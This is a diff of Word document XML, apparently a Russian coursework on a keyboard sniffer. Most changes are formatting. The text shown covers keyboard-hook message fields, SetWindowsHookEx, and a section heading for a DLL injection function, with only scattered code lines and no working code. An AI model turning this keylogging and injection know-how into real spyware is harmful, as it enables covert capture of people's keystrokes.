-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>f</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>lags устанавливает флажок дополнительной клавиши, флажок события ввода, контекстный код и флажок переходного состояния.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="240" w:line="360" w:lineRule="auto"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>t</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>ime у</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>станавливает отмет</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>ку времени для этого сообщения.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="240" w:line="360" w:lineRule="auto"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>dwExtraInfo</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>у</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>станавливает дополнительную информацию, связанную с сообщением.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:val="en-US"/>
+        <w:ind w:firstLine="708"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:b/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
         </w:rPr>
       </w:pPr>
       <w:r>
@@ -5390,17 +8268,16 @@
           <w:b/>
           <w:bCs/>
           <w:sz w:val="32"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:val="en-US" w:eastAsia="en-US"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:eastAsia="en-US"/>
         </w:rPr>
       </w:pPr>
     </w:p>
@@ -5415,7 +8292,7 @@
       </w:pPr>
       <w:r>
         <w:rPr>
-          <w:lang w:val="en-US" w:eastAsia="en-US"/>
+          <w:lang w:eastAsia="en-US"/>
         </w:rPr>
         <w:br w:type="page"/>
       </w:r>
@@ -7184,7 +10061,7 @@
 </file>
 
 <file path=customXml/itemProps1.xml><?xml version="1.0" encoding="utf-8"?>
-<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{1ADB4ECF-1CFD-4959-ADB1-6BA976634ADD}">
+<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{B8C3A08D-E4A9-4CE8-A49E-89A29BC5122B}">
   <ds:schemaRefs>
     <ds:schemaRef ds:uri="http://schemas.openxmlformats.org/officeDocument/2006/bibliography"/>
   </ds:schemaRefs>

--- a/Курсовая_Работа_Клавиатурный_Сниффер .docx
+++ b/Курсовая_Работа_Клавиатурный_Сниффер .docx
@@ -2858,7 +2858,6 @@
           <w:b/>
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
-          <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t>.1</w:t>
       </w:r>
@@ -2895,7 +2894,6 @@
         <w:rPr>
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
-          <w:lang w:val="en-US"/>
         </w:rPr>
       </w:pPr>
       <w:r>
@@ -2910,9 +2908,23 @@
         <w:rPr>
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> SetWindowsHookEx( </w:t>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>SetWindowsHookEx</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve">( </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -2926,7 +2938,6 @@
         <w:rPr>
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
-          <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
@@ -2942,7 +2953,6 @@
         <w:rPr>
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
-          <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t xml:space="preserve">, </w:t>
       </w:r>
@@ -2958,7 +2968,6 @@
         <w:rPr>
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
-          <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
@@ -2974,7 +2983,6 @@
         <w:rPr>
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
-          <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t xml:space="preserve">, </w:t>
       </w:r>
@@ -2990,7 +2998,6 @@
         <w:rPr>
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
-          <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
@@ -3006,7 +3013,6 @@
         <w:rPr>
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
-          <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t xml:space="preserve">, </w:t>
       </w:r>
@@ -3022,7 +3028,6 @@
         <w:rPr>
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
-          <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
@@ -3038,7 +3043,6 @@
         <w:rPr>
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
-          <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t xml:space="preserve">) - </w:t>
       </w:r>
@@ -3060,7 +3064,6 @@
         <w:rPr>
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
-          <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
@@ -3075,7 +3078,6 @@
         <w:rPr>
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
-          <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
@@ -3090,7 +3092,6 @@
         <w:rPr>
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
-          <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
@@ -3105,7 +3106,6 @@
         <w:rPr>
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
-          <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
@@ -3120,9 +3120,23 @@
         <w:rPr>
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> (hook) </w:t>
+        </w:rPr>
+        <w:t xml:space="preserve"> (</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>hook</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve">) </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -3135,7 +3149,6 @@
         <w:rPr>
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
-          <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
@@ -3150,7 +3163,6 @@
         <w:rPr>
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
-          <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
@@ -3165,9 +3177,23 @@
         <w:rPr>
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> (hook).</w:t>
+        </w:rPr>
+        <w:t xml:space="preserve"> (</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>hook</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>).</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3835,6 +3861,7 @@
           <w:b/>
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
+          <w:lang w:val="en-US"/>
         </w:rPr>
       </w:pPr>
       <w:r>
@@ -5522,6 +5549,7 @@
         <w:rPr>
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
+          <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
@@ -5537,6 +5565,7 @@
         <w:rPr>
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
+          <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
@@ -5551,6 +5580,7 @@
         <w:rPr>
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
+          <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
@@ -5565,6 +5595,7 @@
         <w:rPr>
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
+          <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
@@ -5579,6 +5610,7 @@
         <w:rPr>
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
+          <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
@@ -5593,6 +5625,7 @@
         <w:rPr>
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
+          <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t xml:space="preserve">. </w:t>
       </w:r>
@@ -6316,22 +6349,24 @@
           <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
           <w:sz w:val="20"/>
           <w:szCs w:val="20"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:tab/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t>{</w:t>
       </w:r>
@@ -6351,14 +6386,16 @@
           <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
           <w:sz w:val="20"/>
           <w:szCs w:val="20"/>
-        </w:rPr>
-        <w:tab/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
         </w:rPr>
         <w:tab/>
       </w:r>
@@ -6409,31 +6446,33 @@
           <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
           <w:sz w:val="20"/>
           <w:szCs w:val="20"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:tab/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:tab/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t>return false;</w:t>
       </w:r>
@@ -6445,13 +6484,15 @@
           <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
           <w:sz w:val="20"/>
           <w:szCs w:val="20"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
         </w:rPr>
         <w:tab/>
         <w:t>}</w:t>
@@ -6464,6 +6505,7 @@
           <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
           <w:sz w:val="20"/>
           <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
         </w:rPr>
       </w:pPr>
     </w:p>
@@ -6482,6 +6524,7 @@
           <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
           <w:sz w:val="20"/>
           <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
         </w:rPr>
         <w:tab/>
       </w:r>
@@ -6553,31 +6596,33 @@
           <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
           <w:sz w:val="20"/>
           <w:szCs w:val="20"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:tab/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:tab/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t>RegCloseKey(hk);</w:t>
       </w:r>
@@ -6589,13 +6634,15 @@
           <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
           <w:sz w:val="20"/>
           <w:szCs w:val="20"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
         </w:rPr>
         <w:tab/>
         <w:t>}</w:t>
@@ -6608,13 +6655,15 @@
           <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
           <w:sz w:val="20"/>
           <w:szCs w:val="20"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
         </w:rPr>
         <w:tab/>
         <w:t>else</w:t>
@@ -6635,6 +6684,7 @@
           <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
           <w:sz w:val="20"/>
           <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
         </w:rPr>
         <w:tab/>
       </w:r>
@@ -6933,31 +6983,33 @@
           <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
           <w:sz w:val="20"/>
           <w:szCs w:val="20"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:tab/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:tab/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t>return false;</w:t>
       </w:r>
@@ -6969,13 +7021,15 @@
           <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
           <w:sz w:val="20"/>
           <w:szCs w:val="20"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
         </w:rPr>
         <w:lastRenderedPageBreak/>
         <w:tab/>
@@ -6989,13 +7043,15 @@
           <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
           <w:sz w:val="20"/>
           <w:szCs w:val="20"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
         </w:rPr>
         <w:tab/>
         <w:t>return true;</w:t>
@@ -7008,13 +7064,15 @@
           <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
           <w:sz w:val="20"/>
           <w:szCs w:val="20"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t>}</w:t>
       </w:r>
@@ -7027,6 +7085,7 @@
         <w:rPr>
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
+          <w:lang w:val="en-US"/>
         </w:rPr>
       </w:pPr>
     </w:p>
@@ -7039,6 +7098,7 @@
           <w:b/>
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
+          <w:lang w:val="en-US"/>
         </w:rPr>
       </w:pPr>
       <w:r>
@@ -7056,7 +7116,41 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
-        <w:t>Процедура инжекции библиотеки</w:t>
+        <w:t>Процедура</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>инжекции</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>библиотеки</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -7188,21 +7282,7 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
-        <w:t xml:space="preserve">при успешной </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>инжекции</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t xml:space="preserve">, при ошибке возвращает значение </w:t>
+        <w:t xml:space="preserve">при успешной инжекции, при ошибке возвращает значение </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -7265,21 +7345,7 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
-        <w:t xml:space="preserve"> – </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>имя инжектируемой библиотеки</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>.</w:t>
+        <w:t xml:space="preserve"> – имя инжектируемой библиотеки.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -7305,14 +7371,49 @@
           <w:b/>
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t xml:space="preserve">5.4.1 Листинг функции </w:t>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">5.4.1 </w:t>
       </w:r>
       <w:r>
         <w:rPr>
           <w:b/>
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>Листинг</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>функции</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
           <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t>Inject</w:t>
@@ -8182,18 +8283,42 @@
           <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
           <w:sz w:val="20"/>
           <w:szCs w:val="20"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="20"/>
